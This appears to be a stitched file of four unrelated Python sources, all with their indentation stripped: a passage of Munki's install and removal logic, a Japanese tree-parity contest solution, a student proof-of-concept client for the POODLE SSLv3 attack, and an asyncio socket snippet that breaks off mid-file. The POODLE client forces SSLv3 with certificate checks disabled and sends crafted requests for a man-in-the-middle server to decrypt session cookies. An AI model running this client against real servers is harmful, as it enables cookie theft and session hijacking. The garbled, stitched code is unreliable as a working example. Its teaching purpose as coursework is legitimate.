item_pl = catalogs.get_item_detail(manifestitem, cataloglist)
if not item_pl:
display.display_warning(
'Could not process item %s for update. No pkginfo found in '
'catalogs: %s ', manifestitem, ', '.join(cataloglist))
return
# we only offer to update if some version of the item is already
# installed, so let's check
if installationstate.some_version_installed(item_pl):
# add to the list of processed managed_updates
installinfo['managed_updates'].append(manifestitemname)
dummy_result = process_install(
manifestitem, cataloglist, installinfo, is_managed_update=True)
else:
display.display_debug1(
'%s does not appear to be installed, so no managed updates...',
manifestitemname)
def process_optional_install(manifestitem, cataloglist, installinfo):
"""Process an optional install item to see if it should be added to
the list of optional installs.
"""
manifestitemname = os.path.split(manifestitem)[1]
display.display_debug1(
"* Processing manifest item %s for optional install" % manifestitemname)
# have we already processed this?
if manifestitemname in installinfo['optional_installs']:
display.display_debug1(
'%s has already been processed for optional install.',
manifestitemname)
return
elif manifestitemname in installinfo['processed_installs']:
display.display_debug1(
'%s has already been processed for install.', manifestitemname)
return
elif manifestitemname in installinfo['processed_uninstalls']:
display.display_debug1(
'%s has already been processed for uninstall.', manifestitemname)
return
# check to see if item (any version) is already in the
# optional_install list:
for item in installinfo['optional_installs']:
if manifestitemname == item['name']:
display.display_debug1(
'%s has already been processed for optional install.',
manifestitemname)
return
item_pl = catalogs.get_item_detail(manifestitem, cataloglist)
if not item_pl:
display.display_warning(
'Could not process item %s for optional install. No pkginfo found '
'in catalogs: %s ', manifestitem, ', '.join(cataloglist))
return
is_currently_installed = installationstate.some_version_installed(item_pl)
if is_currently_installed and unused_software.should_be_removed(item_pl):
process_removal(manifestitem, cataloglist, installinfo)
installer.remove_from_selfserve_installs(manifestitem)
return
# if we get to this point we can add this item
# to the list of optional installs
iteminfo = {}
iteminfo['name'] = item_pl.get('name', manifestitemname)
iteminfo['description'] = item_pl.get('description', '')
iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
iteminfo['display_name'] = item_pl.get('display_name', '')
for key in ['category', 'developer', 'featured', 'icon_name', 'icon_hash',
'requires', 'RestartAction']:
if key in item_pl:
iteminfo[key] = item_pl[key]
iteminfo['installed'] = is_currently_installed
if iteminfo['installed']:
iteminfo['needs_update'] = (
installationstate.installed_state(item_pl) == 0)
iteminfo['licensed_seat_info_available'] = item_pl.get(
'licensed_seat_info_available', False)
iteminfo['uninstallable'] = (
item_pl.get('uninstallable', False)
and (item_pl.get('uninstall_method', '') != ''))
iteminfo['installer_item_size'] = \
item_pl.get('installer_item_size', 0)
iteminfo['installed_size'] = item_pl.get(
'installer_item_size', iteminfo['installer_item_size'])
if (not iteminfo['installed']) or (iteminfo.get('needs_update')):
if not download.enough_disk_space(
item_pl, installinfo.get('managed_installs', []), warn=False):
iteminfo['note'] = (
'Insufficient disk space to download and install.')
optional_keys = ['preinstall_alert',
'preuninstall_alert',
'preupgrade_alert',
'OnDemand']
for key in optional_keys:
if key in item_pl:
iteminfo[key] = item_pl[key]
display.display_debug1(
'Adding %s to the optional install list', iteminfo['name'])
installinfo['optional_installs'].append(iteminfo)
def process_install(manifestitem, cataloglist, installinfo,
is_managed_update=False):
"""Processes a manifest item for install. Determines if it needs to be
installed, and if so, if any items it is dependent on need to
be installed first. Installation detail is added to
installinfo['managed_installs']
Calls itself recursively as it processes dependencies.
Returns a boolean; when processing dependencies, a false return
will stop the installation of a dependent item
"""
manifestitemname = os.path.split(manifestitem)[1]
display.display_debug1(
'* Processing manifest item %s for install', manifestitemname)
(manifestitemname_withoutversion, includedversion) = (
catalogs.split_name_and_version(manifestitemname))
# have we processed this already?
if manifestitemname in installinfo['processed_installs']:
display.display_debug1(
'%s has already been processed for install.', manifestitemname)
return True
elif (manifestitemname_withoutversion in
installinfo['processed_uninstalls']):
display.display_warning(
'Will not process %s for install because it has already '
'been processed for uninstall!', manifestitemname)
return False
item_pl = catalogs.get_item_detail(manifestitem, cataloglist)
if not item_pl:
display.display_warning(
'Could not process item %s for install. No pkginfo found in '
'catalogs: %s ', manifestitem, ', '.join(cataloglist))
return False
elif is_managed_update:
# we're processing this as a managed update, so don't
# add it to the processed_installs list
pass
else:
# we found it, so add it to our list of procssed installs
# so we don't process it again in the future
display.display_debug2(
'Adding %s to list of processed installs' % manifestitemname)
installinfo['processed_installs'].append(manifestitemname)
if item_in_installinfo(item_pl, installinfo['managed_installs'],
vers=item_pl.get('version')):
# has this item already been added to the list of things to install?
display.display_debug1(
'%s is or will be installed.', manifestitemname)
return True
# check dependencies
dependencies_met = True
# there are two kinds of dependencies/relationships.
#
# 'requires' are prerequistes:
# package A requires package B be installed first.
# if package A is removed, package B is unaffected.
# requires can be a one to many relationship.
#
# The second type of relationship is 'update_for'.
# This signifies that that current package should be considered an update
# for the packages listed in the 'update_for' array. When processing a
# package, we look through the catalogs for other packages that declare
# they are updates for the current package and install them if needed.
# This can be a one-to-many relationship - one package can be an update
# for several other packages; for example, 'PhotoshopCS4update-11.0.1'
# could be an update for PhotoshopCS4 and for AdobeCS4DesignSuite.
#
# When removing an item, any updates for that item are removed as well.
if 'requires' in item_pl:
dependencies = item_pl['requires']
# fix things if 'requires' was specified as a string
# instead of an array of strings
if isinstance(dependencies, basestring):
dependencies = [dependencies]
for item in dependencies:
display.display_detail(
'%s-%s requires %s. Getting info on %s...'
% (item_pl.get('name', manifestitemname),
item_pl.get('version', ''), item, item))
success = process_install(item, cataloglist, installinfo,
is_managed_update=is_managed_update)
if not success:
dependencies_met = False
iteminfo = {}
iteminfo['name'] = item_pl.get('name', '')
iteminfo['display_name'] = item_pl.get('display_name', iteminfo['name'])
iteminfo['description'] = item_pl.get('description', '')
if not dependencies_met:
display.display_warning(
'Didn\'t attempt to install %s because could not resolve all '
'dependencies.', manifestitemname)
# add information to managed_installs so we have some feedback
# to display in MSC.app
iteminfo['installed'] = False
iteminfo['note'] = ('Can\'t install %s because could not resolve all '
'dependencies.' % iteminfo['display_name'])
iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
installinfo['managed_installs'].append(iteminfo)
return False
installed_state = installationstate.installed_state(item_pl)
if installed_state == 0:
display.display_detail('Need to install %s', manifestitemname)
iteminfo['installer_item_size'] = item_pl.get(
'installer_item_size', 0)
iteminfo['installed_size'] = item_pl.get(
'installed_size', iteminfo['installer_item_size'])
try:
# Get a timestamp, then download the installer item.
start = datetime.datetime.now()
if item_pl.get('installer_type', 0) == 'nopkg':
# Packageless install
download_speed = 0
filename = 'packageless_install'
else:
if download.download_installeritem(item_pl, installinfo):
# Record the download speed to the InstallResults output.
end = datetime.datetime.now()
download_seconds = (end - start).seconds
try:
if iteminfo['installer_item_size'] < 1024:
# ignore downloads under 1 MB or speeds will
# be skewed.
download_speed = 0
else:
# installer_item_size is KBytes, so divide
# by seconds.
download_speed = int(
iteminfo['installer_item_size'] /
download_seconds)
except (TypeError, ValueError, ZeroDivisionError):
download_speed = 0
else:
# Item was already in cache; set download_speed to 0.
download_speed = 0
filename = download.get_url_basename(
item_pl['installer_item_location'])
iteminfo['download_kbytes_per_sec'] = download_speed
if download_speed:
display.display_detail(
'%s downloaded at %d KB/s', filename, download_speed)
# required keys
iteminfo['installer_item'] = filename
iteminfo['installed'] = False
iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
# we will ignore the unattended_install key if the item needs a
# restart or logout...
if (item_pl.get('unattended_install') or
item_pl.get('forced_install')):
if item_pl.get('RestartAction', 'None') != 'None':
display.display_warning(
'Ignoring unattended_install key for %s because '
'RestartAction is %s.',
item_pl['name'], item_pl.get('RestartAction'))
else:
iteminfo['unattended_install'] = True
# optional keys
optional_keys = ['suppress_bundle_relocation',
'installer_choices_xml',
'installer_environment',
'adobe_install_info',
'RestartAction',
'installer_type',
'adobe_package_name',
'package_path',
'blocking_applications',
'installs',
'requires',
'update_for',
'payloads',
'preinstall_script',
'postinstall_script',
'items_to_copy', # used w/ copy_from_dmg
'copy_local', # used w/ AdobeCS5 Updaters
'force_install_after_date',
'apple_item',
'category',
'developer',
'icon_name',
'PayloadIdentifier',
'icon_hash',
'OnDemand']
for key in optional_keys:
if key in item_pl:
iteminfo[key] = item_pl[key]
if 'apple_item' not in iteminfo:
# admin did not explicitly mark this item; let's determine if
# it's from Apple
if is_apple_item(item_pl):
munkilog.log(
'Marking %s as apple_item - this will block '
'Apple SUS updates' % iteminfo['name'])
iteminfo['apple_item'] = True
installinfo['managed_installs'].append(iteminfo)
update_list = []
# (manifestitemname_withoutversion, includedversion) =
# nameAndVersion(manifestitemname)
if includedversion:
# a specific version was specified in the manifest
# so look only for updates for this specific version
update_list = catalogs.look_for_updates_for_version(
manifestitemname_withoutversion,
includedversion, cataloglist)
else:
# didn't specify a specific version, so
# now look for all updates for this item
update_list = catalogs.look_for_updates(
manifestitemname_withoutversion, cataloglist)
# now append any updates specifically
# for the version to be installed
update_list.extend(
catalogs.look_for_updates_for_version(
manifestitemname_withoutversion,
iteminfo['version_to_install'],
cataloglist))
for update_item in update_list:
# call processInstall recursively so we get the
# latest version and dependencies
dummy_result = process_install(
update_item, cataloglist, installinfo,
is_managed_update=is_managed_update)
return True
except fetch.PackageVerificationError:
display.display_warning(
'Can\'t install %s because the integrity check failed.',
manifestitem)
iteminfo['installed'] = False
iteminfo['note'] = 'Integrity check failed'
iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
installinfo['managed_installs'].append(iteminfo)
if manifestitemname in installinfo['processed_installs']:
installinfo['processed_installs'].remove(manifestitemname)
return False
except (fetch.GurlError, fetch.GurlDownloadError), errmsg:
display.display_warning(
'Download of %s failed: %s', manifestitem, errmsg)
iteminfo['installed'] = False
iteminfo['note'] = u'Download failed (%s)' % errmsg
iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
installinfo['managed_installs'].append(iteminfo)
if manifestitemname in installinfo['processed_installs']:
installinfo['processed_installs'].remove(manifestitemname)
return False
except fetch.Error, errmsg:
display.display_warning(
'Can\'t install %s because: %s', manifestitemname, errmsg)
iteminfo['installed'] = False
iteminfo['note'] = '%s' % errmsg
iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
installinfo['managed_installs'].append(iteminfo)
if manifestitemname in installinfo['processed_installs']:
installinfo['processed_installs'].remove(manifestitemname)
return False
else:
iteminfo['installed'] = True
# record installed size for reporting
iteminfo['installed_size'] = item_pl.get(
'installed_size', item_pl.get('installer_item_size', 0))
if installed_state == 1:
# just use the version from the pkginfo
iteminfo['installed_version'] = item_pl['version']
else:
# might be newer; attempt to figure out the version
installed_version = compare.get_installed_version(item_pl)
if installed_version == "UNKNOWN":
installed_version = '(newer than %s)' % item_pl['version']
iteminfo['installed_version'] = installed_version
installinfo['managed_installs'].append(iteminfo)
# remove included version number if any
(name, includedversion) = catalogs.split_name_and_version(
manifestitemname)
display.display_detail('%s version %s (or newer) is already installed.',
name, item_pl['version'])
update_list = []
if not includedversion:
# no specific version is specified;
# the item is already installed;
# now look for updates for this item
update_list = catalogs.look_for_updates(name, cataloglist)
# and also any for this specific version
installed_version = iteminfo['installed_version']
if not installed_version.startswith('(newer than '):
update_list.extend(
catalogs.look_for_updates_for_version(
name, installed_version, cataloglist))
elif compare.compare_versions(
includedversion, iteminfo['installed_version']) == 1:
# manifest specifies a specific version
# if that's what's installed, look for any updates
# specific to this version
update_list = catalogs.look_for_updates_for_version(
manifestitemname_withoutversion, includedversion, cataloglist)
# if we have any updates, process them
for update_item in update_list:
# call processInstall recursively so we get updates
# and any dependencies
dummy_result = process_install(
update_item, cataloglist, installinfo,
is_managed_update=is_managed_update)
return True
def process_manifest_for_key(manifest, manifest_key, installinfo,
parentcatalogs=None):
"""Processes keys in manifests to build the lists of items to install and
remove.
Can be recursive if manifests include other manifests.
Probably doesn't handle circular manifest references well.
manifest can be a path to a manifest file or a dictionary object.
"""
if isinstance(manifest, basestring):
display.display_debug1(
"** Processing manifest %s for %s" %
(os.path.basename(manifest), manifest_key))
manifestdata = manifestutils.get_manifest_data(manifest)
else:
manifestdata = manifest
manifest = 'embedded manifest'
cataloglist = manifestdata.get('catalogs')
if cataloglist:
catalogs.get_catalogs(cataloglist)
elif parentcatalogs:
cataloglist = parentcatalogs
if not cataloglist:
display.display_warning('Manifest %s has no catalogs', manifest)
return
for item in manifestdata.get('included_manifests', []):
nestedmanifestpath = manifestutils.get_manifest(item)
if not nestedmanifestpath:
raise manifestutils.ManifestException
if processes.stop_requested():
return {}
process_manifest_for_key(nestedmanifestpath, manifest_key,
installinfo, cataloglist)
conditionalitems = manifestdata.get('conditional_items', [])
if conditionalitems:
display.display_debug1(
'** Processing conditional_items in %s', manifest)
# conditionalitems should be an array of dicts
# each dict has a predicate; the rest consists of the
# same keys as a manifest
for item in conditionalitems:
try:
predicate = item['condition']
except (AttributeError, KeyError):
display.display_warning(
'Missing predicate for conditional_item %s', item)
continue
except BaseException:
display.display_warning(
'Conditional item is malformed: %s', item)
continue
if info.predicate_evaluates_as_true(
predicate, additional_info={'catalogs': cataloglist}):
conditionalmanifest = item
process_manifest_for_key(
conditionalmanifest, manifest_key, installinfo, cataloglist)
for item in manifestdata.get(manifest_key, []):
if processes.stop_requested():
return {}
if manifest_key == 'managed_installs':
dummy_result = process_install(item, cataloglist, installinfo)
elif manifest_key == 'managed_updates':
process_managed_update(item, cataloglist, installinfo)
elif manifest_key == 'optional_installs':
process_optional_install(item, cataloglist, installinfo)
elif manifest_key == 'managed_uninstalls':
dummy_result = process_removal(item, cataloglist, installinfo)
def process_removal(manifestitem, cataloglist, installinfo):
"""Processes a manifest item; attempts to determine if it
needs to be removed, and if it can be removed.
Unlike installs, removals aren't really version-specific -
If we can figure out how to remove the currently installed
version, we do, unless the admin specifies a specific version
number in the manifest. In that case, we only attempt a
removal if the version installed matches the specific version
in the manifest.
Any items dependent on the given item need to be removed first.
Items to be removed are added to installinfo['removals'].
Calls itself recursively as it processes dependencies.
Returns a boolean; when processing dependencies, a false return
will stop the removal of a dependent item.
"""
def get_receipts_to_remove(item):
"""Returns a list of receipts to remove for item"""
name = item['name']
pkgdata = catalogs.analyze_installed_pkgs()
if name in pkgdata['receipts_for_name']:
return pkgdata['receipts_for_name'][name]
return []
manifestitemname_withversion = os.path.split(manifestitem)[1]
display.display_debug1(
'* Processing manifest item %s for removal' %
manifestitemname_withversion)
(manifestitemname, includedversion) = catalogs.split_name_and_version(
manifestitemname_withversion)
# have we processed this already?
if manifestitemname in [catalogs.split_name_and_version(item)[0]
for item in installinfo['processed_installs']]:
display.display_warning(
'Will not attempt to remove %s because some version of it is in '
'the list of managed installs, or it is required by another'
' managed install.', manifestitemname)
return False
elif manifestitemname in installinfo['processed_uninstalls']:
display.display_debug1(
'%s has already been processed for removal.', manifestitemname)
return True
else:
installinfo['processed_uninstalls'].append(manifestitemname)
infoitems = []
if includedversion:
# a specific version was specified
item_pl = catalogs.get_item_detail(
manifestitemname, cataloglist, includedversion)
if item_pl:
infoitems.append(item_pl)
else:
# get all items matching the name provided
infoitems = catalogs.get_all_items_with_name(
manifestitemname, cataloglist)
if not infoitems:
display.display_warning(
'Could not process item %s for removal. No pkginfo found in '
'catalogs: %s ', manifestitemname, ', '.join(cataloglist))
return False
install_evidence = False
for item in infoitems:
display.display_debug2('Considering item %s-%s for removal info',
item['name'], item['version'])
if installationstate.evidence_this_is_installed(item):
install_evidence = True
break
else:
display.display_debug2(
'%s-%s not installed.', item['name'], item['version'])
if not install_evidence:
display.display_detail(
'%s doesn\'t appear to be installed.', manifestitemname_withversion)
iteminfo = {}
iteminfo['name'] = manifestitemname
iteminfo['installed'] = False
installinfo['removals'].append(iteminfo)
return True
# if we get here, install_evidence is true, and item
# holds the item we found install evidence for, so we
# should use that item to do the removal
uninstall_item = None
packages_to_remove = []
# check for uninstall info
# and grab the first uninstall method we find.
if item.get('uninstallable') and 'uninstall_method' in item:
uninstallmethod = item['uninstall_method']
if uninstallmethod == 'removepackages':
packages_to_remove = get_receipts_to_remove(item)
if packages_to_remove:
uninstall_item = item
elif uninstallmethod.startswith('Adobe'):
# Adobe CS3/CS4/CS5/CS6/CC product
uninstall_item = item
elif uninstallmethod in ['remove_copied_items',
'remove_app',
'uninstall_script',
'remove_profile']:
uninstall_item = item
else:
# uninstall_method is a local script.
# Check to see if it exists and is executable
if os.path.exists(uninstallmethod) and \
os.access(uninstallmethod, os.X_OK):
uninstall_item = item
if not uninstall_item:
# the uninstall info for the item couldn't be matched
# to what's on disk
display.display_warning('Could not find uninstall info for %s.',
manifestitemname_withversion)
return False
# if we got this far, we have enough info to attempt an uninstall.
# the pkginfo is in uninstall_item
# Now check for dependent items
#
# First, look through catalogs for items that are required by this item;
# if any are installed, we need to remove them as well
#
# still not sure how to handle references to specific versions --
# if another package says it requires SomePackage--1.0.0.0.0
# and we're supposed to remove SomePackage--1.0.1.0.0... what do we do?
#
dependentitemsremoved = True
uninstall_item_name = uninstall_item.get('name')
uninstall_name_w_version = (
'%s-%s' % (uninstall_item.get('name'), uninstall_item.get('version')))
alt_uninstall_name_w_version = (
'%s--%s' % (uninstall_item.get('name'), uninstall_item.get('version')))
processednames = []
for catalogname in cataloglist:
if not catalogname in catalogs.catalogs():
# in case the list refers to a non-existent catalog
continue
for item_pl in catalogs.catalogs()[catalogname]['items']:
name = item_pl.get('name')
if name not in processednames:
if 'requires' in item_pl:
if (uninstall_item_name in item_pl['requires'] or
uninstall_name_w_version
in item_pl['requires'] or
alt_uninstall_name_w_version
in item_pl['requires']):
display.display_debug1(
'%s requires %s, checking to see if it\'s '
'installed...', item_pl.get('name'),
manifestitemname)
if installationstate.evidence_this_is_installed(
item_pl):
display.display_detail(
'%s requires %s. %s must be removed as well.',
item_pl.get('name'), manifestitemname,
item_pl.get('name'))
success = process_removal(
item_pl.get('name'), cataloglist, installinfo)
if not success:
dependentitemsremoved = False
break
# record this name so we don't process it again
processednames.append(name)
if not dependentitemsremoved:
display.display_warning('Will not attempt to remove %s because could '
'not remove all items dependent on it.',
manifestitemname_withversion)
return False
# Finally! We can record the removal information!
iteminfo = {}
iteminfo['name'] = uninstall_item.get('name', '')
iteminfo['display_name'] = uninstall_item.get('display_name', '')
iteminfo['description'] = 'Will be removed.'
# we will ignore the unattended_uninstall key if the item needs a restart
# or logout...
if (uninstall_item.get('unattended_uninstall') or
uninstall_item.get('forced_uninstall')):
if uninstall_item.get('RestartAction', 'None') != 'None':
display.display_warning(
'Ignoring unattended_uninstall key for %s '
'because RestartAction is %s.',
uninstall_item['name'],
uninstall_item.get('RestartAction'))
else:
iteminfo['unattended_uninstall'] = True
# some keys we'll copy if they exist
optional_keys = ['blocking_applications',
'installs',
'requires',
'update_for',
'payloads',
'preuninstall_script',
'postuninstall_script',
'apple_item',
'category',
'developer',
'icon_name',
'PayloadIdentifier']
for key in optional_keys:
if key in uninstall_item:
iteminfo[key] = uninstall_item[key]
if 'apple_item' not in iteminfo:
# admin did not explicitly mark this item; let's determine if
# it's from Apple
if is_apple_item(item_pl):
iteminfo['apple_item'] = True
if packages_to_remove:
# remove references for each package
packages_to_really_remove = []
for pkg in packages_to_remove:
display.display_debug1('Considering %s for removal...', pkg)
# find pkg in pkgdata['pkg_references'] and remove the reference
# so we only remove packages if we're the last reference to it
pkgdata = catalogs.analyze_installed_pkgs()
if pkg in pkgdata['pkg_references']:
display.display_debug1('%s references are: %s', pkg,
pkgdata['pkg_references'][pkg])
if iteminfo['name'] in pkgdata['pkg_references'][pkg]:
pkgdata['pkg_references'][pkg].remove(iteminfo['name'])
if len(pkgdata['pkg_references'][pkg]) == 0:
display.display_debug1(
'Adding %s to removal list.', pkg)
packages_to_really_remove.append(pkg)
else:
# This shouldn't happen
display.display_warning(
'pkg id %s missing from pkgdata', pkg)
if packages_to_really_remove:
iteminfo['packages'] = packages_to_really_remove
else:
# no packages that belong to this item only.
display.display_warning('could not find unique packages to remove '
'for %s', iteminfo['name'])
return False
iteminfo['uninstall_method'] = uninstallmethod
if uninstallmethod.startswith('Adobe'):
if (uninstallmethod == "AdobeCS5AAMEEPackage" and
'adobe_install_info' in item):
iteminfo['adobe_install_info'] = item['adobe_install_info']
else:
if 'uninstaller_item_location' in item:
location = uninstall_item['uninstaller_item_location']
else:
location = uninstall_item['installer_item_location']
try:
download.download_installeritem(
item, installinfo, uninstalling=True)
filename = os.path.split(location)[1]
iteminfo['uninstaller_item'] = filename
iteminfo['adobe_package_name'] = uninstall_item.get(
'adobe_package_name', '')
except fetch.PackageVerificationError:
display.display_warning(
'Can\'t uninstall %s because the integrity check '
'failed.', iteminfo['name'])
return False
except fetch.Error, errmsg:
display.display_warning(
'Failed to download the uninstaller for %s because %s',
iteminfo['name'], errmsg)
return False
elif uninstallmethod == 'remove_copied_items':
iteminfo['items_to_remove'] = item.get('items_to_copy', [])
elif uninstallmethod == 'remove_app':
if uninstall_item.get('installs', None):
iteminfo['remove_app_info'] = uninstall_item['installs'][0]
elif uninstallmethod == 'uninstall_script':
iteminfo['uninstall_script'] = item.get('uninstall_script', '')
# before we add this removal to the list,
# check for installed updates and add them to the
# removal list as well:
update_list = catalogs.look_for_updates(uninstall_item_name, cataloglist)
update_list.extend(catalogs.look_for_updates(
uninstall_name_w_version, cataloglist))
update_list.extend(catalogs.look_for_updates(
alt_uninstall_name_w_version, cataloglist))
for update_item in update_list:
# call us recursively...
dummy_result = process_removal(update_item, cataloglist, installinfo)
# finish recording info for this removal
iteminfo['installed'] = True
iteminfo['installed_version'] = uninstall_item.get('version')
if 'RestartAction' in uninstall_item:
iteminfo['RestartAction'] = uninstall_item['RestartAction']
installinfo['removals'].append(iteminfo)
display.display_detail(
'Removal of %s added to ManagedInstaller tasks.',
manifestitemname_withversion)
return True
if __name__ == '__main__':
print 'This is a library of support tools for the Munki Suite.'
|
# モジュールのインポート
import sys
sys.setrecursionlimit(1000000)
# 標準入力を取得
N, Q = list(map(int, input().split()))
g = {i: [] for i in range(1, N + 1)}
for _ in range(N - 1):
a, b = list(map(int, input().split()))
g[a].append(b)
g[b].append(a)
q = []
for _ in range(Q):
c, d = list(map(int, input().split()))
q.append((c, d))
# 求解処理
t = {i: -1 for i in range(1, N + 1)}
def dfs(g: dict, t: dict, depth: int, node: int) -> None:
if t[node] != -1:
return
t[node] = depth
for child in g[node]:
dfs(g, t, depth + 1, child)
dfs(g, t, 0, 1)
for c, d in q:
if abs(t[c] - t[d]) % 2 == 0:
print("Town")
else:
print("Road")
|
# ================================================================================
#
# httpsRequest.py
#
# This is the https client request program written for my proof of concept program
# to demonstrate the SSLv3 Padding Oracle On Downgraded Legacy Encryption.
# (POODLE) attack.
#
# Written in Python 2.7.7, requires ssl, socket, sys, select, os, multiprocessing, Queue
# Should work for any 2.x python
#
# Authors: Ryan Grandgenett
# For: IASC 8410-001
# Date: March 2015
#
# ================================================================================
# Imports
import ssl
import socket
import sys
import select
import os
import multiprocessing
import Queue
from optparse import OptionParser
#
# Builds https request used by the Man-in-the-Middle server program. The idea is an attacker
# needs a way to control the data before and after the target blocks (session cookie) in order
# to use the Poodle exploit. To accomplish this requirement an attacker may use a HTTPS post request
# because this would allow the attacker to control the url and post data portion of the post request.
#
def build_request(hostname, urlData, postData):
# Build the request
request = (
'POST %s HTTP/1.0\r\n'
'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n'
'Accept-Language: en-us\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Connection: Keep-Alive\r\n'
'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n'
'Host: %s\r\n'
'Content-Length: %d\r\n'
'Cache-Control: no-cache\r\n'
'Cookie: PHPSESSID=566tkbpdjdbcrcism2bfthhmt4\r\n\r\n'
'data=%s') % (urlData, hostname, len('data=' + postData), postData)
# Return the request
return request
#
# Sends the SSL request to the remote web server, the https request is sent using SSLv3
#
def ssl_request(hostname, port, cipher, request):
# Connect to remote web server
while 1:
try:
ssl_socket = socket.create_connection((hostname, port))
break
except:
print "[-] Error connecting to remote web server %s. Trying again!" % (hostname)
# Allow socket.SO_REUSEADDR
ssl_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Make SSLv3 connection to the remote web server
ssl_socket = ssl.wrap_socket(ssl_socket, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3, cert_reqs=ssl.CERT_NONE, ciphers=cipher)
#ssl_socket = ssl.wrap_socket(ssl_socket, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3, cert_reqs=ssl.CERT_NONE, ciphers="SHA1+DES")
#ssl_socket = ssl.wrap_socket(ssl_socket, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3, cert_reqs=ssl.CERT_NONE, ciphers="RSA+AES")
try:
# Send request to remote server
ssl_socket.send(request)
# Wait for server response
ssl_socket.recv(4096)
# If we got to here, then decryption was successful!
# The MiM server was able to decrypt one byte
ssl_socket.close()
except:
# Decryption failed. Close the socket so resources will be available for future requests
ssl_socket.close()
#
# Function that is executed by the start exploit process. The job of this process is to
# wait until the exploit worker process is ready to start the POOODLE exploit, then fire
# off the first https request.
#
def StartExploit(q, hostname, port, cipher, message_url_data, message_post_data):
try:
# Wait for the exploit worker process to signal it is ready to start the
# POODLE exploit
result = q.get(timeout=300)
# The the exploit worker process is ready to start the POODLE exploit
if result == True:
# Send the first https request to get the MiM server started
urlData = message_url_data
postData = message_post_data
payload = build_request(hostname, urlData, postData)
ssl_request(hostname, port, cipher, payload)
# Else there was an error putting data in the queue
else:
print "[-] Error bad data found in queue."
os._exit(1)
except Queue.Empty:
print "[-] Error failed to get data from the queue."
os._exit(1)
#
# Function that is executed by the exploit worker process. The job of this process is to
# create and send a properly formatted https request using the data it receives from the MiM server.
#
def ExploitWorker(q, listen_port, hostname, port, cipher):
HOST = '0.0.0.0' # Listening on all interfaces
PORT = listen_port # Port to listen on
urlData = '' # Variable to save url data from MiM server
postData = '' # Variable to save post data from MiM server
# Set the number of backlogged connections the https request program will handle
backlog = 1
# Set the number of bytes the https request program will receive from the socket
size = 1024
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Allow socket.SO_REUSEADDR
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind the socket to the port
s.bind((HOST, PORT))
# Listen for connections
s.listen(backlog)
# Wait for incoming connections
server, address = s.accept()
# Set the server to non-blocking
server.setblocking(0)
# Let the start exploit process know that the https request program has connected
# to the MiM server and is ready to start the exploit
try:
q.put(True,timeout=300)
except Queue.Full:
print "[-] Error failed to write data to queue"
os._exit(1)
# Infinite loop used to get request data from the MiM server
try:
while 1:
# Verify socket is ready to read data
ready = select.select([server], [], [], 300)
# If socket has data to read
if ready[0]:
# Read in data from server
data = server.recv(size)
# If MiM server is done decrypting blocks, then quit the program
if data == 'quit\n':
server.close()
sys.exit(1)
# Else get the url and post data from the MiM server and make a new https request
else:
# Strip off the newline
payload = (data.rstrip('\n'))
# Get the url data
urlData = payload.split('$')[0]
# Get the post data
postData = payload.split('$')[1]
# Create the https post request
request = build_request(hostname, urlData, postData)
# Send the https post request to the web server
ssl_request(hostname, port, cipher, request)
except KeyboardInterrupt:
print "Exiting..."
os._exit(1)
#
# Program main function called on program start
#
def main():
# Parse the command line arguments
parser = OptionParser(epilog="Report bugs to rmgrandgenett@unomaha.edu", description="HTTPS client request program used to demonstrate the SSLv3 Padding Oracle On Downgraded Legacy Encryption (POODLE) attack.", version="0.1")
parser.add_option('-l', help='port for https request program to listen for connection from MiM server', action='store', dest='listen_port')
parser.add_option('-n', help='hostname of web server(ex. poodle.unonullify.com)', action='store', dest='hostname')
parser.add_option('-p', help='https port of web server(ex. 443)', action='store', dest='port')
parser.add_option('-c', help='SSL cipher string to use(ex. DH+3DES)', action='store', dest='cipher')
parser.add_option('-u', help='initial url data value (must match server MiM server)', action='store', dest='message_url_data')
parser.add_option('-d', help='initial post request data value (must match server MiM server)', action='store', dest='message_post_data')
# Verify the required command line arguments are present
(options, args) = parser.parse_args(sys.argv)
if not options.listen_port or not options.hostname or not options.port or not options.cipher or not options.message_post_data or not options.message_url_data:
print '\n[-] -l, -n, -p, -c, -u, and -d are required. Please use the -h flag for help.'
sys.exit(1)
# Start the start exploit and exploit worker processes
try:
# Queue used to signal when the ExploitWorker process is ready to begin exploit
q = multiprocessing.Queue()
# Start exploit process
start_exploit = multiprocessing.Process(target=StartExploit, args=(q,str(options.hostname),int(options.port), str(options.cipher), str(options.message_url_data),str(options.message_post_data)))
# Exploit worker processes
exploit_worker = multiprocessing.Process(target=ExploitWorker, args=(q,int(options.listen_port),str(options.hostname),str(options.port), str(options.cipher)))
# Start the exploit start process
start_exploit.start()
# Start the exploit worker process
exploit_worker.start()
# Wait for start exploit process to return
start_exploit.join()
# Wait for exploit worker process to return
exploit_worker.join()
except KeyboardInterrupt:
print "Exiting..."
os._exit(1)
# Hook
if __name__ == '__main__':
main() |
# 使用多线程: 在协程中集成阻塞io
import asyncio
import socket
import time
from concurrent.futures.thread import ThreadPoolExecutor
from urllib.parse import urlparse
def get_url(url):
url = urlparse(url)
path = url.path
host = url.netloc
if path == "":
path = "/"
# client 为固定写法
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, 80))
# http 的 send() 方法固定写法:
client.send("GET {} HTTP/1.1\r\nHost:{}\r\nConnection:close\r\n\r\n".format(path, host).encode("utf8"))
data = b""
while True:
d = client.recv(1024)
if d:
data += d
else:
break
client.close()
print(data.decode("utf-8").split("\r\n\r\n")[1])
return data.decode("utf-8").split("\r\n\r\n")[1]
if __name__ == '__main__':
start_time = time.time()
loop = asyncio.get_event_loop()
# 声明一个线程池, 可以加入限制线程数
executor = ThreadPoolExecutor()
# loop.run_in_executor(executor, func_name, func_args)
